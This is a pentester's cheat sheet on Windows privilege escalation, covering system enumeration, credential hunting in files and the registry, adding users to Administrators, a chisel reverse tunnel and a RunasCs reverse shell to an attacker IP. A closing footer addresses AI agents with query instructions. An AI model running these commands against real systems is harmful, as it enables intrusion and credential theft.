# Windows Privilege Escalation

### [Automation](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#automation) <a href="#automation" id="automation"></a>

We might be able to find vulnerabilities on target Windows machine with automation tools as below:

* [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [wesng (Windows Exploit Suggester Next Generation)](https://github.com/bitsadmin/wesng)

<br>

### [LOLBAS (Living Off the Land Binaries, Scripts and Libraries)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#lolbas-\(living-off-the-land-binaries%2C-scripts-and-libraries\)) <a href="#lolbas-living-off-the-land-binaries-2c-scripts-and-libraries" id="lolbas-living-off-the-land-binaries-2c-scripts-and-libraries"></a>

[LOLBAS](https://lolbas-project.github.io/) provides misuses tools and executables already in the Windows system. So check the website.

<br>

### [OS Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#os-information) <a href="#os-information" id="os-information"></a>

```powershell
hostname
systeminfo
systeminfo | findstr "OS"
ver
[System.Environment]::OSVersion.Version

# Datetime
Get-Date
Copied!
```

### [Interesting Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#interesting-information) <a href="#interesting-information" id="interesting-information"></a>

```powershell
# Current user
whoami
whoami /user
whoami /groups
whoami /priv
whoami /all
echo %username%

# List users
net user
net users
net user USERNAME
Get-LocalUser

# List groups
net group
net localgroup
# List users in specific group
net localgroup "Remote Management Users"

# List user home directories
Get-ChildItem C:\Users -Force

# Network
ipconfig
ipconfig /all
route print
arp -A
Get-NetAdapter

# Firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
Copied!
```

#### [Find OS Vulnerabilities](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#find-os-vulnerabilities) <a href="#find-os-vulnerabilities" id="find-os-vulnerabilities"></a>

After investigating the OS information, find the vulnerabilities of OS version.

<br>

### [Recent Files](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#recent-files) <a href="#recent-files" id="recent-files"></a>

1. Right-click on the Windows icon.
2. Click **Run**.
3. Type `recent`in the search form.

<br>

### [Running Services](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#running-services) <a href="#running-services" id="running-services"></a>

Using **the Windows Management Instrumentation command-line (WMIC)** mainly.

```powershell
wmic service list
wmic service list | findstr "Backup"

# Get target process info
wmic process get processid,parentprocessid,executablepath | find "<process-id>"
# Get users SID
wmic useraccount get name,sid
# Launch the hidden executable hiding within ADS
wmic process call create $(Resolve-Path .\file.exe:streamname)

# Processes and services
sc query state=all
tasklist /svc

# Query the configuration info for a specified service
sc qc "Development Service"
Copied!
```

<br>

### [Histories](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#histories) <a href="#histories" id="histories"></a>

#### [Command History in PowerShell Console](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#command-history-in-powershell-console) <a href="#command-history-in-powershell-console" id="command-history-in-powershell-console"></a>

```powershell
type c:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Copied!
```

#### [Web Browser Hidsotries](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#web-browser-hidsotries) <a href="#web-browser-hidsotries" id="web-browser-hidsotries"></a>

We might be able to find interesting information about users by checking histories of web browsers such as **Chrome**, **Microsoft Edge**, **Internet Explorer**, etc.

<br>

### [VSS (Volume Shadow Copy Service)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#vss-\(volume-shadow-copy-service\)) <a href="#vss-volume-shadow-copy-service" id="vss-volume-shadow-copy-service"></a>

VSS coordinates the actions that are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

```powershell
vssadmin
vssadmin list shadows
vssadmin list volumes
Copied!
```

<br>

### [Registry Keys](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#registry-keys) <a href="#registry-keys" id="registry-keys"></a>

We may be able to retrieve sensitive information in registry hives.\
See also: [Windows PrivEsc with Registry Keys](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-registry-keys)

```bash
# List all subkeys of a registry key
Get-ChildItem -Path HKCU:\ | Select-Object Name
# -Recurse: List recursively
Get-ChildItem -Path HKCU:\System -Recurse | Select-Object Name

# Search sensitive information in HKLM (HKEY_LOCAL_MACHINE)
# /f password: Specifies the keyword 'password' to search.
# /t REG_SZ: Specifies REG_SZ (string) type to search.
# /s: Specifies to query all subkeys and value names recursively.
reg query HKLM /f password /t REG_SZ /s
Copied!
```

<br>

### [Running Processes](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#running-processes) <a href="#running-processes" id="running-processes"></a>

```bash
# -a: All connections and ports
# -f: Display FQDN (Fully Qualified Domain Names)
# -o: Display the owning process ID associated with each connection
netstat -afo

Get-Process
# Exclude `svchost`
Get-Process | where {$_.ProcessName -notlike "svchost*"}
Copied!
```

<br>

### [Sensitive Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#sensitive-information) <a href="#sensitive-information" id="sensitive-information"></a>

```powershell
# /s: Searches the current directory and all subdirectories.
# /i: Ignores the case of the characters.
findstr /si password *.txt *.xml *.ini
findstr /si password c:\Users\Administrator\*.txt
findstr /si cred *.txt *.xml *.ini
findstr /si cred c:\Users\Administrator\*.txt

# /p: Skips files with non-printable characters.
# /n: Prints the line number of each line that matches.
findstr /spin "password" *.*
findstr /spin "password" c:\Users\Administrator\*

# ListList files
# /a: Displays only the names of those directories and files.
dir /a \Users\Administrator\Desktop
# /s: Lists every oncurrece of the specified file name within the specified directory and all subdirectories.
dir /s *pass* == *cred* == *vnc* == *.config*
# /q: Displays the ownership information.
dir /q \Users\Administrator\Desktop

# Website folder
dir c:\inetpub\

# SQL server
dir c:\SQLServer\Logs
type c:\SQLServer\Logs\ERRORLOG.BAK

# Get contents of file
more .\example.txt
type .\example.txt

# Check Recycle.bin and SID Folder
dir -Force \'$Recycle.Bin'

# ManageEngine (this service has many vulnerabilities)
dir -Force \'Program Files (x86)'\ManageEngine\
Copied!
```

#### [Find Interesting Files](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#find-interesting-files) <a href="#find-interesting-files" id="find-interesting-files"></a>

```powershell
PS> Get-ChildItem -Path c:\\ -Filter "*.txt" -Recurse 2>$null
# Directories
PS> Get-ChildItem -Path c:\\ -Directory -Filter "Example" -Recurse 2>$null
Copied!
```

#### [Collect Emails](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#collect-emails) <a href="#collect-emails" id="collect-emails"></a>

Reference: [Atomic Rea Team](https://atomicredteam.io/collection/T1114.001/)

We can collect the information about emails such as **Outlook** on the following directories.

```powershell
C:\Users\<username>\Documents\Outlook Files
C:\Users\<username>\AppData\Local\Microsoft\Outlook
Copied!
```

<br>

### [Open Ports](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#open-ports) <a href="#open-ports" id="open-ports"></a>

```bash
netstat -a
Copied!
```

If we found the listening ports, we need to port forwarding to access the port in local machine.\
For example, assume the port 8000 is listening. We can access to the target port 8000 by accessing to **`[http://localhost:8000](http://localhost:8000)`** in local by executing the following command.

```bash
# Remote (target) machine
chisel.exe client 10.0.0.1:9999 R:8000:127.0.0.1:8000

# Local (attacker) machine
chisel server --reverse -p 9999
Copied!
```

Please refer to [this page](https://exploit-notes.hdks.org/exploit/network/port-forwarding/port-forwarding-with-chisel) to check how to use Chisel for port forwarding.

<br>

### [Getting All Local Users/Groups](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#getting-all-local-users%2Fgroups) <a href="#getting-all-local-users-2fgroups" id="getting-all-local-users-2fgroups"></a>

We can find all local users in **Computer Management** utility. To open, enter **"computer management"** in search form at the bottom of the windows screen.

In Computer Management, click **"Local Users and Groups"**.

#### [Enumerate Users](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#enumerate-users) <a href="#enumerate-users" id="enumerate-users"></a>

1. Click **"Users"**.
2. Double-click each user to get details e.g. **"Member Of"**.

#### [Enumerate Groups](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#enumerate-groups) <a href="#enumerate-groups" id="enumerate-groups"></a>

1. Click **"Groups"**.
2. Double-click each group.
3. Attempt to add new user in the group because we might be able to do that even if we are not an administrator.

<br>

### [Change File Permission](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#change-file-permission) <a href="#change-file-permission" id="change-file-permission"></a>

1. Right-click on the file.
2. Select the **Properties**.
3. Click the **Security** tab.
4. Click **“Advanced”**.
5. In the **Permissions** tab, click the **“Add”**.
6. Click **“Select a principal”**.
7. Enter the username in the text field.
8. Click **OK** and **Apply**.

Also we can change permissions in CommandPrompt or PowerShell.

```powershell
icacls 'C:\Path\to\file' /grant Users:F
icacls 'C:\Path\to\file' /grant Everyone:F
Copied!
```

<br>

### [Change User/Group Permission](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#change-user%2Fgroup-permission) <a href="#change-user-2fgroup-permission" id="change-user-2fgroup-permission"></a>

```powershell
# Change user's password
net user USERNAME NEWPASSWORD

# Add new user
net user /add USERNAME PASSWORD

# Add user to group
net localgroup Administrators USERNAME /add
net localgroup "Remote Managment Users" USERNAME /add   # For WinRM
net localgroup "Remote Desktop Users" USERNAME /add     # For RDP

# Delete users from specific group
net localgroup "Remote Management Users" USERNAME /delete
Copied!
```

If we could change the permission, connect to the target via **WinRM** or **RDP**.

<br>

### [Take Ownership of a File (Administrators Group Required)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#take-ownership-of-a-file-\(administrators-group-required\)) <a href="#take-ownership-of-a-file-administrators-group-required" id="take-ownership-of-a-file-administrators-group-required"></a>

```powershell
# Check if the current user belongs to the Administrators group. 
net user USERNAME

# Move to the directory containing the desired file
cd \Users\Administrator\Desktop

# Enable an administrator to recover access to a file.
# /R: recursive operation
# /F: specify the filename
takeown /r /f *.*

# Modify dictionary access control lists on specified files
# /q: suppress success message
# /c: continue the operation despite any file errors
# /t: perform the operation on all specified files
# /grant: grant specified user access rights
icacls "example.txt" /q /c /t /grant Users:F
Copied!
```

<br>

### [Switch Another User](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#switch-another-user) <a href="#switch-another-user" id="switch-another-user"></a>

```bash
runas /user:<domain>\<username> cmd
runas /user:<username>\ explorer.exe
Copied!
```

#### [Spawn Another Session as Another User](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#spawn-another-session-as-another-user) <a href="#spawn-another-session-as-another-user" id="spawn-another-session-as-another-user"></a>

If we cannot switch user due to such as reverse shell sessions, we can spawn another shell as another user by using [RunasCS](https://github.com/antonioCoco/RunasCs).

First, start a listener in local machine.

```bash
nc -lvnp 4444
Copied!
```

Then execute the following command in target machine.\
Replace **`username`** and **`password`** with the credential of the user that we want to switch to.

```bash
RunasCs.exe username password cmd -r 10.0.0.1:4444
Copied!
```

<br>

### [All Privs for Local Service, Network Service Account](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#all-privs-for-local-service%2C-network-service-account) <a href="#all-privs-for-local-service-2c-network-service-account" id="all-privs-for-local-service-2c-network-service-account"></a>

If we’re `Local Service` or `Network Service` account, it maybe possible to grant all privileges to the account.

[FullPowers](https://github.com/itm4n/FullPowers) is a powerful tool for doing that.

```powershell
FullPower

# Confirm if the account has all privileges
whoami /priv
Copied!
```

<br>

### [Event Logs](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#event-logs) <a href="#event-logs" id="event-logs"></a>

* **Event Viewer**
* **FullEventLogview**

<br>

### [Tasks](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#tasks) <a href="#tasks" id="tasks"></a>

* **Task Schedular**

<br>

### [Sysinternals](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#sysinternals) <a href="#sysinternals" id="sysinternals"></a>

Tools that offer technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.

```sh
# Autoruns
# It shows what programs are configured to run during system bootup or login.
autoruns.exe

# Process Explorer
# A freeware task manager and system monitor.
procexp.exe
procexp64.exe

# Process Monitor
# It monitors and displays in real-time all file system activity.
procmon.exe
procmon64.exe

# Strings
# It is same as the Linux “strings” command.
strings.exe example.exe | findstr "sometext"
strings64.exe example.exe | findstr "sometext"
Copied!
```

### References

* <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation>
* <https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/ad-privilege-escalation/windows-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.